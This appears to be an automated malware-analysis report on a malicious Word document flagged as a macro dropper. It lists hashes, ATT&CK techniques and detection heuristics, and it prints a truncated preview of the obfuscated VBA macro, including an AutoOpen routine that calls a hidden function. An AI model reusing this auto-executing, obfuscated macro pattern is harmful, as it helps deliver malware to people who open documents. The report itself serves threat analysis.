Office (OLE) malware analysis — malicious · 8cf43294595a0ed5

MALICIOUS

Office (OLE)

155.5 KB Created: 2018-04-26 19:44:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: 00c9599e51592cc7059aed2d1d35eaf7 SHA-1: 7a64d92367c9625b969483032cc65ef1cae42dd0 SHA-256: 8cf43294595a0ed5a94dbbd1788cc0cce2bbd8a37fbe6e574982cf2950041b11

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro includes a critical `Shell()` call, indicating an attempt to execute arbitrary commands. This is further supported by ClamAV detecting it as a dropper, suggesting it's designed to download and execute additional malware. The presence of an AutoOpen macro also points to automatic execution upon opening.

Heuristics 6

ClamAV: Doc.Dropper.Agent-6520244-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6520244-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 50091 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	50091 bytes
SHA-256: `d965e9b8d9a4df3483a850297936c59549f5a448887cc9349b3a9d4a158ab1fb`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "aJniODi" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub coTTEB(wQiNmj) Select Case TMzKN Case 42563 EiiSIj = nbHaL jzOuwd = Round(25859) LjjSm = Hex(niFiGX - ChrW(YKlBwR)) IpbmbA = TwCLkI Case 58876 vBzWtQ = CByte(10176) YUnhI = Log(dtCLmI) End Select End Sub Sub Hurlw(jCWWP) Select Case iPjCZ Case 45341 DTCSo = jiUJJ WWXnH = Round(15677) vzVTCw = Hex(NdZuq - ChrW(ocFBFb)) SOoPs = zszHb Case 53663 ocMiAA = CByte(39122) FFFaS = Log(juQVif) End Select Select Case SjJGa Case 80085 iPWwS = nMPXBF lMIjo = Round(49976) Nwhlsw = Hex(WvDcZK - ChrW(mqjGI)) tXftU = XUGXZR Case 1609 mjikF = CByte(42089) RQLvb = Log(nzWZcj) End Select Select Case mqTnR Case 29720 TPXdK = AiFHw mNbGT = Round(97351) ikVjwz = Hex(wWwMvT - ChrW(zpBthk)) tFtOa = uqLjAo Case 47898 nwjYja = CByte(53625) lsMfLo = Log(aNlOp) End Select End Sub Sub fbVXVq(LMMGu) Select Case JqVUB Case 19513 PTACvQ = SlWOa rIWKBL = Round(68128) SZjFl = Hex(fhEsk - ChrW(NZLaS)) Flnaqz = KRBUKT Case 80653 FzuUzJ = CByte(27247) ljdiW = Log(SwvsY) End Select Select Case zirii Case 48657 kiMtZu = IbRGVS LCuNSK = Round(78324) EYRukc = Hex(GLmXj - ChrW(vYmEks)) ripXF = mjzVP Case 29140 kZnciJ = CByte(1433) UGTzjN = Log(dHJiR) End Select End Sub Sub Autoopen() On Error Resume Next Select Case IZjupV Case 81498 IqWIzt = kKZar WYVaWB = Round(43927) qLhzK = Hex(zEipoK - ChrW(MPwolT)) twjHZw = ANTSUT Case 77186 ipLmR = CByte(43986) ckmhhK = Log(Zmkhd) End Select PmsfNJKPqz (tcZXL + HwbAnbw + wrOWTq) Select Case tkGdw Case 4047 NUwVs = crnhi piZCQn = Round(52028) YoOOTq = Hex(QZSJlf - ChrW(wYdEf)) OHDhoj = bThqp Case 45800 wYGkBB = CByte(80269) SVYwH = Log(iAZLHj) End Select End Sub Sub Qljam(zwrbTN) Select Case JXSsC Case 57383 CphJr = TtTIf rNhmZK = Round(28862) qPatE = Hex(CYKijI - ChrW(bKbDXi)) WGdiw = Wqcksi Case 76606 OnOoE = CByte(17905) uikcW = Log(QDFiB) End Select Select Case Bpjlsz Case 36854 LwZpz = MMXNP YrbYs = Round(11956) hFnWC = Hex(GmcfBW - ChrW(lzKwIu)) CrEjsT = DJNKtl Case 45398 GYZXzr = CByte(65172) jVqYib = Log(dQzbXq) End Select Select Case HdiIC Case 56934 UIkTz = mYkvnU XKCvA = Round(53282) kuvKAu = Hex(Qwpqo - ChrW(WLMGE)) kvFjCo = jiwbm Case 15918 BdaNaT = CByte(9334) VbuFwQ = Log(LzwrRq) End Select End Sub Sub fNsWzL(TVCiN) Select Case slzjl Case 56967 Zdlzpm = Swfvqj wMUDV = Round(86959) CGrWk = Hex(sawPG - ChrW(sGCbvj)) NHUqG = ijtYic Case 29283 lXWtaF = CByte(47999) sAPpC = Log(OwkYXK) End Select End Sub Attribute VB_Name = "FhQliGhzBTn" Sub DHjfiV(lHOUbR) Select Case nRznFE Case 8173 fpGIv = rGqjbw jfQCDw = Round(48345) qNoTp = Hex(PBNOi - ChrW(zbuYZZ)) uBYozS = DmjlCH C ... (truncated)

SHA-256: d965e9b8d9a4df3483a850297936c59549f5a448887cc9349b3a9d4a158ab1fb

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "aJniODi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub coTTEB(wQiNmj)
Select Case TMzKN
         Case 42563
            EiiSIj = nbHaL
            jzOuwd = Round(25859)
            LjjSm = Hex(niFiGX - ChrW(YKlBwR))
            IpbmbA = TwCLkI
         Case 58876
            vBzWtQ = CByte(10176)
            YUnhI = Log(dtCLmI)
End Select
End Sub
Sub Hurlw(jCWWP)
Select Case iPjCZ
         Case 45341
            DTCSo = jiUJJ
            WWXnH = Round(15677)
            vzVTCw = Hex(NdZuq - ChrW(ocFBFb))
            SOoPs = zszHb
         Case 53663
            ocMiAA = CByte(39122)
            FFFaS = Log(juQVif)
End Select
Select Case SjJGa
         Case 80085
            iPWwS = nMPXBF
            lMIjo = Round(49976)
            Nwhlsw = Hex(WvDcZK - ChrW(mqjGI))
            tXftU = XUGXZR
         Case 1609
            mjikF = CByte(42089)
            RQLvb = Log(nzWZcj)
End Select
Select Case mqTnR
         Case 29720
            TPXdK = AiFHw
            mNbGT = Round(97351)
            ikVjwz = Hex(wWwMvT - ChrW(zpBthk))
            tFtOa = uqLjAo
         Case 47898
            nwjYja = CByte(53625)
            lsMfLo = Log(aNlOp)
End Select
End Sub
Sub fbVXVq(LMMGu)
Select Case JqVUB
         Case 19513
            PTACvQ = SlWOa
            rIWKBL = Round(68128)
            SZjFl = Hex(fhEsk - ChrW(NZLaS))
            Flnaqz = KRBUKT
         Case 80653
            FzuUzJ = CByte(27247)
            ljdiW = Log(SwvsY)
End Select
Select Case zirii
         Case 48657
            kiMtZu = IbRGVS
            LCuNSK = Round(78324)
            EYRukc = Hex(GLmXj - ChrW(vYmEks))
            ripXF = mjzVP
         Case 29140
            kZnciJ = CByte(1433)
            UGTzjN = Log(dHJiR)
End Select
End Sub
Sub Autoopen()
On Error Resume Next
Select Case IZjupV
         Case 81498
            IqWIzt = kKZar
            WYVaWB = Round(43927)
            qLhzK = Hex(zEipoK - ChrW(MPwolT))
            twjHZw = ANTSUT
         Case 77186
            ipLmR = CByte(43986)
            ckmhhK = Log(Zmkhd)
End Select
PmsfNJKPqz (tcZXL + HwbAnbw + wrOWTq)
Select Case tkGdw
         Case 4047
            NUwVs = crnhi
            piZCQn = Round(52028)
            YoOOTq = Hex(QZSJlf - ChrW(wYdEf))
            OHDhoj = bThqp
         Case 45800
            wYGkBB = CByte(80269)
            SVYwH = Log(iAZLHj)
End Select
End Sub
Sub Qljam(zwrbTN)
Select Case JXSsC
         Case 57383
            CphJr = TtTIf
            rNhmZK = Round(28862)
            qPatE = Hex(CYKijI - ChrW(bKbDXi))
            WGdiw = Wqcksi
         Case 76606
            OnOoE = CByte(17905)
            uikcW = Log(QDFiB)
End Select
Select Case Bpjlsz
         Case 36854
            LwZpz = MMXNP
            YrbYs = Round(11956)
            hFnWC = Hex(GmcfBW - ChrW(lzKwIu))
            CrEjsT = DJNKtl
         Case 45398
            GYZXzr = CByte(65172)
            jVqYib = Log(dQzbXq)
End Select
Select Case HdiIC
         Case 56934
            UIkTz = mYkvnU
            XKCvA = Round(53282)
            kuvKAu = Hex(Qwpqo - ChrW(WLMGE))
            kvFjCo = jiwbm
         Case 15918
            BdaNaT = CByte(9334)
            VbuFwQ = Log(LzwrRq)
End Select
End Sub
Sub fNsWzL(TVCiN)
Select Case slzjl
         Case 56967
            Zdlzpm = Swfvqj
            wMUDV = Round(86959)
            CGrWk = Hex(sawPG - ChrW(sGCbvj))
            NHUqG = ijtYic
         Case 29283
            lXWtaF = CByte(47999)
            sAPpC = Log(OwkYXK)
End Select
End Sub

Attribute VB_Name = "FhQliGhzBTn"
Sub DHjfiV(lHOUbR)
Select Case nRznFE
         Case 8173
            fpGIv = rGqjbw
            jfQCDw = Round(48345)
            qNoTp = Hex(PBNOi - ChrW(zbuYZZ))
            uBYozS = DmjlCH
         C
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.